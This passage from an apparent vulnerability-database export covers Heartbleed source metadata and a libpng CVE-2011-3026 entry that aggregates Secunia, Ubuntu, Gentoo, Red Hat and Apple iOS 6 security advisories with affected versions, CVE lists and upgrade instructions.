"db": "PACKETSTORM",
"id": "126644",
"ident": null
},
{
"date": "2014-04-15T23:01:44",
"db": "PACKETSTORM",
"id": "126164",
"ident": null
},
{
"date": "2014-04-09T22:48:55",
"db": "PACKETSTORM",
"id": "126086",
"ident": null
},
{
"date": "2014-04-07T22:44:13",
"db": "PACKETSTORM",
"id": "126045",
"ident": null
},
{
"date": "2014-06-30T23:47:20",
"db": "PACKETSTORM",
"id": "127279",
"ident": null
},
{
"date": "2014-06-13T13:31:03",
"db": "PACKETSTORM",
"id": "127085",
"ident": null
},
{
"date": "2014-05-23T13:13:00",
"db": "PACKETSTORM",
"id": "126784",
"ident": null
},
{
"date": "2014-04-07T22:55:03.893000",
"db": "NVD",
"id": "CVE-2014-0160",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2016-05-13T00:00:00",
"db": "CERT/CC",
"id": "VU#720951",
"ident": null
},
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2014-0160",
"ident": null
},
{
"date": "2015-04-13T21:20:00",
"db": "BID",
"id": "64074",
"ident": null
},
{
"date": "2015-04-13T21:44:00",
"db": "BID",
"id": "65604",
"ident": null
},
{
"date": "2025-10-22T01:15:53.233000",
"db": "NVD",
"id": "CVE-2014-0160",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "network",
"sources": [
{
"db": "BID",
"id": "64074"
},
{
"db": "BID",
"id": "65604"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "OpenSSL TLS heartbeat extension read overflow discloses sensitive information",
"sources": [
{
"db": "CERT/CC",
"id": "VU#720951"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "Failure to Handle Exceptional Conditions",
"sources": [
{
"db": "BID",
"id": "64074"
}
],
"trust": 0.3
}
}
VAR-201202-0137
Vulnerability from variot - Updated: 2026-03-09 20:07Integer overflow in libpng, as used in Google Chrome before 17.0.963.56, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that trigger an integer truncation. Autonomy Keyview IDOL contains multiple vulnerabilities in file parsers. These vulnerabilities could allow a remote attacker to execute arbitrary code on an affected system. libpng is prone to a remote integer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Failed exploit attempts will likely crash the library. Micro Focus Autonomy KeyView IDOL is a library from Micro Focus UK that can decode more than 1000 different file formats. A security vulnerability exists in Micro Focus Autonomy KeyView IDOL versions prior to 10.16. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
TITLE: Symantec Products KeyView File Processing Vulnerabilities
SECUNIA ADVISORY ID: SA51365
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51365/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51365
RELEASE DATE: 2012-11-21
DISCUSS ADVISORY: http://secunia.com/advisories/51365/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/51365/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=51365
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Symantec has acknowledged some vulnerabilities in multiple products, which can be exploited by malicious people to compromise a vulnerable system.
For more information: SA51362
The vulnerabilities are reported in the following products: * Symantec Mail Security for Microsoft Exchange (SMSMSE) versions 6.5.x * Symantec Mail Security for Domino (SMSDOM) versions 8.1.x * Symantec Messaging Gateway (SMG) versions 9.5.x * Symantec Data Loss Prevention(DLP) Enforce/Detection Servers for Windows versions 11.x * Symantec Data Loss Prevention Enforce/Detection Servers for Linux versions 11.x * Symantec Data Loss Prevention Endpoint Agents versions 11.x
SOLUTION: Update of upgrade to a fixed version.
Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
ORIGINAL ADVISORY: Symantec: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20121120_00
US-CERT: http://www.kb.cert.org/vuls/id/849841
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. ============================================================================ Ubuntu Security Notice USN-1367-2 February 17, 2012
firefox vulnerability
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 11.10
- Ubuntu 11.04
- Ubuntu 10.10
- Ubuntu 10.04 LTS
Summary:
Firefox could be made to crash or run programs as your login if it opened a specially crafted file.
Original advisory details:
Jueri Aedla discovered that libpng did not properly verify the size used when allocating memory during chunk decompression. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201206-15
http://security.gentoo.org/
Severity: Normal Title: libpng: Multiple vulnerabilities Date: June 22, 2012 Bugs: #373967, #386185, #401987, #404197, #410153 ID: 201206-15
Synopsis
Multiple vulnerabilities in libpng might allow remote attackers to execute arbitrary code or cause a Denial of Service condition. It is used by several programs, including web browsers and potentially server processes.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 media-libs/libpng < 1.5.10 >= 1.5.10 *>= 1.2.49
Description
Multiple vulnerabilities have been discovered in libpng:
- The "embedded_profile_len()" function in pngwutil.c does not check for negative values, resulting in a memory leak (CVE-2009-5063).
- The "png_format_buffer()" function in pngerror.c contains an off-by-one error (CVE-2011-2501).
- The "png_rgb_to_gray()" function in pngrtran.c contains an integer overflow error (CVE-2011-2690).
- The "png_err()" function in pngerror.c contains a NULL pointer dereference error (CVE-2011-2691).
- The "png_handle_sCAL()" function in pngrutil.c improperly handles malformed sCAL chunks(CVE-2011-2692).
- The "png_decompress_chunk()" function in pngrutil.c contains an integer overflow error (CVE-2011-3026).
- The "png_inflate()" function in pngrutil.c contains and out of bounds error (CVE-2011-3045).
- The "png_set_text_2()" function in pngset.c contains an error which could result in memory corruption (CVE-2011-3048).
- The "png_formatted_warning()" function in pngerror.c contains an off-by-one error (CVE-2011-3464).
Workaround
There is no known workaround at this time.
Resolution
All libpng 1.5 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/libpng-1.5.10"
All libpng 1.2 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/libpng-1.2.49"
Packages which depend on this library may need to be recompiled. Tools such as revdep-rebuild may assist in identifying some of these packages.
References
[ 1 ] CVE-2009-5063 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-5063 [ 2 ] CVE-2011-2501 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2501 [ 3 ] CVE-2011-2690 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2690 [ 4 ] CVE-2011-2691 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2691 [ 5 ] CVE-2011-2692 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2692 [ 6 ] CVE-2011-3026 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3026 [ 7 ] CVE-2011-3045 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3045 [ 8 ] CVE-2011-3048 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3048 [ 9 ] CVE-2011-3464 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3464
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201206-15.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . Summary:
Updated seamonkey packages that fix one security issue are now available for Red Hat Enterprise Linux 4.
The Red Hat Security Response Team has rated this update as having critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux AS version 4 - i386, ia64, ppc, s390, s390x, x86_64 Red Hat Enterprise Linux Desktop version 4 - i386, x86_64 Red Hat Enterprise Linux ES version 4 - i386, ia64, x86_64 Red Hat Enterprise Linux WS version 4 - i386, ia64, x86_64
- Description:
SeaMonkey is an open source web browser, e-mail and newsgroup client, IRC chat client, and HTML editor.
A heap-based buffer overflow flaw was found in the way SeaMonkey handled PNG (Portable Network Graphics) images. (CVE-2011-3026)
All SeaMonkey users should upgrade to these updated packages, which correct this issue. After installing the update, SeaMonkey must be restarted for the changes to take effect.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259
- Bugs fixed (http://bugzilla.redhat.com/):
790737 - CVE-2011-3026 libpng: Heap-buffer-overflow in png_decompress_chunk
- Package List:
Red Hat Enterprise Linux AS version 4:
Source: ftp://updates.redhat.com/enterprise/4AS/en/os/SRPMS/seamonkey-1.0.9-79.el4.src.rpm
i386: seamonkey-1.0.9-79.el4.i386.rpm seamonkey-chat-1.0.9-79.el4.i386.rpm seamonkey-debuginfo-1.0.9-79.el4.i386.rpm seamonkey-devel-1.0.9-79.el4.i386.rpm seamonkey-dom-inspector-1.0.9-79.el4.i386.rpm seamonkey-js-debugger-1.0.9-79.el4.i386.rpm seamonkey-mail-1.0.9-79.el4.i386.rpm
ia64: seamonkey-1.0.9-79.el4.ia64.rpm seamonkey-chat-1.0.9-79.el4.ia64.rpm seamonkey-debuginfo-1.0.9-79.el4.ia64.rpm seamonkey-devel-1.0.9-79.el4.ia64.rpm seamonkey-dom-inspector-1.0.9-79.el4.ia64.rpm seamonkey-js-debugger-1.0.9-79.el4.ia64.rpm seamonkey-mail-1.0.9-79.el4.ia64.rpm
ppc: seamonkey-1.0.9-79.el4.ppc.rpm seamonkey-chat-1.0.9-79.el4.ppc.rpm seamonkey-debuginfo-1.0.9-79.el4.ppc.rpm seamonkey-devel-1.0.9-79.el4.ppc.rpm seamonkey-dom-inspector-1.0.9-79.el4.ppc.rpm seamonkey-js-debugger-1.0.9-79.el4.ppc.rpm seamonkey-mail-1.0.9-79.el4.ppc.rpm
s390: seamonkey-1.0.9-79.el4.s390.rpm seamonkey-chat-1.0.9-79.el4.s390.rpm seamonkey-debuginfo-1.0.9-79.el4.s390.rpm seamonkey-devel-1.0.9-79.el4.s390.rpm seamonkey-dom-inspector-1.0.9-79.el4.s390.rpm seamonkey-js-debugger-1.0.9-79.el4.s390.rpm seamonkey-mail-1.0.9-79.el4.s390.rpm
s390x: seamonkey-1.0.9-79.el4.s390x.rpm seamonkey-chat-1.0.9-79.el4.s390x.rpm seamonkey-debuginfo-1.0.9-79.el4.s390x.rpm seamonkey-devel-1.0.9-79.el4.s390x.rpm seamonkey-dom-inspector-1.0.9-79.el4.s390x.rpm seamonkey-js-debugger-1.0.9-79.el4.s390x.rpm seamonkey-mail-1.0.9-79.el4.s390x.rpm
x86_64: seamonkey-1.0.9-79.el4.x86_64.rpm seamonkey-chat-1.0.9-79.el4.x86_64.rpm seamonkey-debuginfo-1.0.9-79.el4.x86_64.rpm seamonkey-devel-1.0.9-79.el4.x86_64.rpm seamonkey-dom-inspector-1.0.9-79.el4.x86_64.rpm seamonkey-js-debugger-1.0.9-79.el4.x86_64.rpm seamonkey-mail-1.0.9-79.el4.x86_64.rpm
Red Hat Enterprise Linux Desktop version 4:
Source: ftp://updates.redhat.com/enterprise/4Desktop/en/os/SRPMS/seamonkey-1.0.9-79.el4.src.rpm
i386: seamonkey-1.0.9-79.el4.i386.rpm seamonkey-chat-1.0.9-79.el4.i386.rpm seamonkey-debuginfo-1.0.9-79.el4.i386.rpm seamonkey-devel-1.0.9-79.el4.i386.rpm seamonkey-dom-inspector-1.0.9-79.el4.i386.rpm seamonkey-js-debugger-1.0.9-79.el4.i386.rpm seamonkey-mail-1.0.9-79.el4.i386.rpm
x86_64: seamonkey-1.0.9-79.el4.x86_64.rpm seamonkey-chat-1.0.9-79.el4.x86_64.rpm seamonkey-debuginfo-1.0.9-79.el4.x86_64.rpm seamonkey-devel-1.0.9-79.el4.x86_64.rpm seamonkey-dom-inspector-1.0.9-79.el4.x86_64.rpm seamonkey-js-debugger-1.0.9-79.el4.x86_64.rpm seamonkey-mail-1.0.9-79.el4.x86_64.rpm
Red Hat Enterprise Linux ES version 4:
Source: ftp://updates.redhat.com/enterprise/4ES/en/os/SRPMS/seamonkey-1.0.9-79.el4.src.rpm
i386: seamonkey-1.0.9-79.el4.i386.rpm seamonkey-chat-1.0.9-79.el4.i386.rpm seamonkey-debuginfo-1.0.9-79.el4.i386.rpm seamonkey-devel-1.0.9-79.el4.i386.rpm seamonkey-dom-inspector-1.0.9-79.el4.i386.rpm seamonkey-js-debugger-1.0.9-79.el4.i386.rpm seamonkey-mail-1.0.9-79.el4.i386.rpm
ia64: seamonkey-1.0.9-79.el4.ia64.rpm seamonkey-chat-1.0.9-79.el4.ia64.rpm seamonkey-debuginfo-1.0.9-79.el4.ia64.rpm seamonkey-devel-1.0.9-79.el4.ia64.rpm seamonkey-dom-inspector-1.0.9-79.el4.ia64.rpm seamonkey-js-debugger-1.0.9-79.el4.ia64.rpm seamonkey-mail-1.0.9-79.el4.ia64.rpm
x86_64: seamonkey-1.0.9-79.el4.x86_64.rpm seamonkey-chat-1.0.9-79.el4.x86_64.rpm seamonkey-debuginfo-1.0.9-79.el4.x86_64.rpm seamonkey-devel-1.0.9-79.el4.x86_64.rpm seamonkey-dom-inspector-1.0.9-79.el4.x86_64.rpm seamonkey-js-debugger-1.0.9-79.el4.x86_64.rpm seamonkey-mail-1.0.9-79.el4.x86_64.rpm
Red Hat Enterprise Linux WS version 4:
Source: ftp://updates.redhat.com/enterprise/4WS/en/os/SRPMS/seamonkey-1.0.9-79.el4.src.rpm
i386: seamonkey-1.0.9-79.el4.i386.rpm seamonkey-chat-1.0.9-79.el4.i386.rpm seamonkey-debuginfo-1.0.9-79.el4.i386.rpm seamonkey-devel-1.0.9-79.el4.i386.rpm seamonkey-dom-inspector-1.0.9-79.el4.i386.rpm seamonkey-js-debugger-1.0.9-79.el4.i386.rpm seamonkey-mail-1.0.9-79.el4.i386.rpm
ia64: seamonkey-1.0.9-79.el4.ia64.rpm seamonkey-chat-1.0.9-79.el4.ia64.rpm seamonkey-debuginfo-1.0.9-79.el4.ia64.rpm seamonkey-devel-1.0.9-79.el4.ia64.rpm seamonkey-dom-inspector-1.0.9-79.el4.ia64.rpm seamonkey-js-debugger-1.0.9-79.el4.ia64.rpm seamonkey-mail-1.0.9-79.el4.ia64.rpm
x86_64: seamonkey-1.0.9-79.el4.x86_64.rpm seamonkey-chat-1.0.9-79.el4.x86_64.rpm seamonkey-debuginfo-1.0.9-79.el4.x86_64.rpm seamonkey-devel-1.0.9-79.el4.x86_64.rpm seamonkey-dom-inspector-1.0.9-79.el4.x86_64.rpm seamonkey-js-debugger-1.0.9-79.el4.x86_64.rpm seamonkey-mail-1.0.9-79.el4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2011-3026.html https://access.redhat.com/security/updates/classification/#critical
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2012 Red Hat, Inc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
APPLE-SA-2012-09-19-1 iOS 6
iOS 6 is now available and addresses the following:
CFNetwork Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to the disclosure of sensitive information Description: An issue existed in CFNetwork's handling of malformed URLs. CFNetwork may send requests to an incorrect hostname, resulting in the disclosure of sensitive information. This issue was addressed through improvements to URL handling. CVE-ID CVE-2012-3724 : Erling Ellingsen of Facebook
CoreGraphics Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Multiple vulnerabilities in FreeType Description: Multiple vulnerabilities existed in FreeType, the most serious of which may lead to arbitrary code execution when processing a maliciously crafted font. These issues were addressed by updating FreeType to version 2.4.9. Further information is available via the FreeType site at http://www.freetype.org/ CVE-ID CVE-2012-1126 CVE-2012-1127 CVE-2012-1128 CVE-2012-1129 CVE-2012-1130 CVE-2012-1131 CVE-2012-1132 CVE-2012-1133 CVE-2012-1134 CVE-2012-1135 CVE-2012-1136 CVE-2012-1137 CVE-2012-1138 CVE-2012-1139 CVE-2012-1140 CVE-2012-1141 CVE-2012-1142 CVE-2012-1143 CVE-2012-1144
CoreMedia Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: An uninitialized memory access existed in the handling of Sorenson encoded movie files. This issue was addressed through improved memory initialization. CVE-ID CVE-2012-3722 : Will Dormann of the CERT/CC
DHCP Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: A malicious Wi-Fi network may be able to determine networks a device has previously accessed Description: Upon connecting to a Wi-Fi network, iOS may broadcast MAC addresses of previously accessed networks per the DNAv4 protocol. This issue was addressed by disabling DNAv4 on unencrypted Wi-Fi networks. CVE-ID CVE-2012-3725 : Mark Wuergler of Immunity, Inc.
ImageIO Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Viewing a maliciously crafted TIFF file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in libtiff's handling of ThunderScan encoded TIFF images. This issue was addressed by updating libtiff to version 3.9.5. CVE-ID CVE-2011-1167
ImageIO Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Viewing a maliciously crafted PNG image may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in libpng's handling of PNG images. These issues were addressed through improved validation of PNG images. CVE-ID CVE-2011-3026 : Juri Aedla CVE-2011-3048 CVE-2011-3328
ImageIO Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Viewing a maliciously crafted JPEG image may lead to an unexpected application termination or arbitrary code execution Description: A double free issue existed in ImageIO's handling of JPEG images. This issue was addressed through improved memory management. CVE-ID CVE-2012-3726 : Phil of PKJE Consulting
ImageIO Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution Description: An integer overflow issue existed in libTIFF's handling of TIFF images. This issue was addressed through improved validation of TIFF images. CVE-ID CVE-2012-1173 : Alexander Gavrun working with HP's Zero Day Initiative
International Components for Unicode Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Applications that use ICU may be vulnerable to an unexpected application termination or arbitrary code execution Description: A stack buffer overflow existed in the handling of ICU locale IDs. This issue was addressed through improved bounds checking. CVE-ID CVE-2011-4599
IPSec Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Loading a maliciously crafted racoon configuration file may lead to arbitrary code execution Description: A buffer overflow existed in the handling of racoon configuration files. This issue was addressed through improved bounds checking. CVE-ID CVE-2012-3727 : iOS Jailbreak Dream Team
Kernel Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: A local user may be able to execute arbitrary code with system privileges Description: An invalid pointer dereference issue existed in the kernel's handling of packet filter ioctls. This may allow an attacker to alter kernel memory. This issue was addressed through improved error handling. CVE-ID CVE-2012-3728 : iOS Jailbreak Dream Team
Kernel Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: A local user may be able to determine kernel memory layout Description: An uninitialized memory access issue existed in the Berkeley Packet Filter interpreter, which led to the disclosure of memory content. This issue was addressed through improved memory initialization. CVE-ID CVE-2012-3729 : Dan Rosenberg
libxml Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Viewing a maliciously crafted web page may lead to an unexpected application termination or arbitrary code execution Description: Multiple vulnerabilities existed in libxml, the most serious of which may lead to an unexpected application termination or arbitrary code execution. These issues were addressed by applying the relevant upstream patches. CVE-ID CVE-2011-1944 : Chris Evans of Google Chrome Security Team CVE-2011-2821 : Yang Dingning of NCNIPC, Graduate University of Chinese Academy of Sciences CVE-2011-2834 : Yang Dingning of NCNIPC, Graduate University of Chinese Academy of Sciences CVE-2011-3919 : Juri Aedla
Mail Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Mail may present the wrong attachment in a message Description: A logic issue existed in Mail's handling of attachments. If a subsequent mail attachment used the same Content-ID as a previous one, the previous attachment would be displayed, even in the case where the 2 mails originated from different senders. This could facilitate some spoofing or phishing attacks. This issue was addressed through improved handling of attachments. CVE-ID CVE-2012-3730 : Angelo Prado of the salesforce.com Product Security Team
Mail Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Email attachments may be read without user's passcode Description: A logic issue existed in Mail's use of Data Protection on email attachments. This issue was addressed by properly setting the Data Protection class for email attachments. CVE-ID CVE-2012-3731 : Stephen Prairie of Travelers Insurance, Erich Stuntebeck of AirWatch
Mail Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: An attacker may spoof the sender of a S/MIME signed message Description: S/MIME signed messages displayed the untrusted 'From' address, instead of the name associated with the message signer's identity. This issue was addressed by displaying the address associated with the message signer's identity when it is available. CVE-ID CVE-2012-3732 : An anonymous researcher
Messages Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: A user may unintentionally disclose the existence of their email addresses Description: When a user had multiple email addresses associated with iMessage, replying to a message may have resulted in the reply being sent from a different email address. This may disclose another email address associated to the user's account. This issue was addressed by always replying from the email address the original message was sent to. CVE-ID CVE-2012-3733 : Rodney S. Foley of Gnomesoft, LLC
Office Viewer Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Unencrypted document data may be written to a temporary file Description: An information disclosure issue existed in the support for viewing Microsoft Office files. When viewing a document, the Office Viewer would write a temporary file containing data from the viewed document to the temporary directory of the invoking process. For an application that uses data protection or other encryption to protect the user's files, this could lead to information disclosure. This issue was addressed by avoiding creation of temporary files when viewing Office documents. CVE-ID CVE-2012-3734 : Salvatore Cataudella of Open Systems Technologies
OpenGL Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Applications that use OS X's OpenGL implementation may be vulnerable to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in the handling of GLSL compilation. These issues were addressed through improved validation of GLSL shaders. CVE-ID CVE-2011-3457 : Chris Evans of the Google Chrome Security Team, and Marc Schoenefeld of the Red Hat Security Response Team
Passcode Lock Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: A person with physical access to the device could briefly view the last used third-party app on a locked device Description: A logic issue existed with the display of the "Slide to Power Off" slider on the lock screen. This issue was addressed through improved lock state management. CVE-ID CVE-2012-3735 : Chris Lawrence DBB
Passcode Lock Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: A person with physical access to the device may be able to bypass the screen lock Description: A logic issue existed in the termination of FaceTime calls from the lock screen. This issue was addressed through improved lock state management. CVE-ID CVE-2012-3736 : Ian Vitek of 2Secure AB
Passcode Lock Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: All photos may be accessible at the lock screen Description: A design issue existed in the support for viewing photos that were taken at the lock screen. In order to determine which photos to permit access to, the passcode lock consulted the time at which the device was locked and compared it to the time that a photo was taken. By spoofing the current time, an attacker could gain access to photos that were taken before the device was locked. This issues was addressed by explicitly keeping track of the photos that were taken while the device was locked. CVE-ID CVE-2012-3737 : Ade Barkah of BlueWax Inc.
Passcode Lock Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: A person with physical access to a locked device may perform FaceTime calls Description: A logic issue existed in the Emergency Dialer screen, which permitted FaceTime calls via Voice Dialing on the locked device. This could also disclose the user's contacts via contact suggestions. This issue was addressed by disabling Voice Dialing on the Emergency Dialer screen. CVE-ID CVE-2012-3738 : Ade Barkah of BlueWax Inc.
Passcode Lock Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: A person with physical access to the device may be able to bypass the screen lock Description: Using the camera from the screen lock could in some cases interfere with automatic lock functionality, allowing a person with physical access to the device to bypass the Passcode Lock screen. This issue was addressed through improved lock state management. CVE-ID CVE-2012-3739 : Sebastian Spanninger of the Austrian Federal Computing Centre (BRZ)
Passcode Lock Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: A person with physical access to the device may be able to bypass the screen lock Description: A state management issue existed in the handling of the screen lock. This issue was addressed through improved lock state management. CVE-ID CVE-2012-3740 : Ian Vitek of 2Secure AB
Restrictions Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: A user may be able to make purchases without entering Apple ID credentials Description: After disabling Restrictions, iOS may not ask for the user's password during a transaction. This issue was addressed by additional enforcement of purchase authorization. CVE-ID CVE-2012-3741 : Kevin Makens of Redwood High School
Safari Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Websites may use characters with an appearance similar to the lock icon in their titles Description: Websites could use a Unicode character to create a lock icon in the page title. This icon was similar in appearance to the icon used to indicate a secure connection, and could have lead the user to believe a secure connection had been established. This issue was addressed by removing these characters from page titles. CVE-ID CVE-2012-3742 : Boku Kihara of Lepidum
Safari Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Passwords may autocomplete even when the site specifies that autocomplete should be disabled Description: Password input elements with the autocomplete attribute set to "off" were being autocompleted. This issue was addressed through improved handling of the autocomplete attribute. CVE-ID CVE-2012-0680 : Dan Poltawski of Moodle
System Logs Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Sandboxed apps may obtain system log content Description: Sandboxed apps had read access to /var/log directory, which may allow them to obtain sensitive information contained in system logs. This issue was addressed by denying sandboxed apps access to the /var/log directory. CVE-ID CVE-2012-3743
Telephony Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: An SMS message may appear to have been sent by an arbitrary user Description: Messages displayed the return address of an SMS message as the sender. Return addresses may be spoofed. This issue was addressed by always displaying the originating address instead of the return address. CVE-ID CVE-2012-3744 : pod2g
Telephony Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: An SMS message may disrupt cellular connectivity Description: An off-by-one buffer overflow existed in the handling of SMS user data headers. This issue was addressed through improved bounds checking. CVE-ID CVE-2012-3745 : pod2g
UIKit Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: An attacker that gains access to a device's filesystem may be able to read files that were being displayed in a UIWebView Description: Applications that use UIWebView may leave unencrypted files on the file system even when a passcode is enabled. This issue was addressed through improved use of data protection. CVE-ID CVE-2012-3746 : Ben Smith of Box
WebKit Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in WebKit. These issues were addressed through improved memory handling. CVE-ID CVE-2011-3016 : miaubiz CVE-2011-3021 : Arthur Gerkis CVE-2011-3027 : miaubiz CVE-2011-3032 : Arthur Gerkis CVE-2011-3034 : Arthur Gerkis CVE-2011-3035 : wushi of team509 working with iDefense VCP, Arthur Gerkis CVE-2011-3036 : miaubiz CVE-2011-3037 : miaubiz CVE-2011-3038 : miaubiz CVE-2011-3039 : miaubiz CVE-2011-3040 : miaubiz CVE-2011-3041 : miaubiz CVE-2011-3042 : miaubiz CVE-2011-3043 : miaubiz CVE-2011-3044 : Arthur Gerkis CVE-2011-3050 : miaubiz CVE-2011-3053 : miaubiz CVE-2011-3059 : Arthur Gerkis CVE-2011-3060 : miaubiz CVE-2011-3064 : Atte Kettunen of OUSPG CVE-2011-3068 : miaubiz CVE-2011-3069 : miaubiz CVE-2011-3071 : pa_kt working with HP's Zero Day Initiative CVE-2011-3073 : Arthur Gerkis CVE-2011-3074 : Slawomir Blazek CVE-2011-3075 : miaubiz CVE-2011-3076 : miaubiz CVE-2011-3078 : Martin Barbella of the Google Chrome Security Team CVE-2011-3081 : miaubiz CVE-2011-3086 : Arthur Gerkis CVE-2011-3089 : Skylined of the Google Chrome Security Team, miaubiz CVE-2011-3090 : Arthur Gerkis CVE-2011-3105 : miaubiz CVE-2011-3913 : Arthur Gerkis 